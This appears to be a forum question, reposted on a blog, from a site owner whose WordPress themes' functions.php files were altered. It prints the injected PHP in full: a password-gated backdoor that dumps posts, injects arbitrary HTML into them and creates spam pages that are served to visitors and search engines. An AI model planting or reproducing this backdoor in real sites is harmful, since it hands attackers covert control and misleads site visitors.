Want to know the reason that the functions.php of WordPress theme was hacked

Seniors.

I found all the WordPress themes on my server were hacked. The functions.php was automatic modified and the following codes was added into the functions.php, what is that? Is there any way to find out the bug? Thanks

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f1d2299e....fe9f82032985c905'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>

Read more here: Want to know the reason that the functions.php of WordPress theme was hacked

Leave a Reply

Your email address will not be published. Required fields are marked *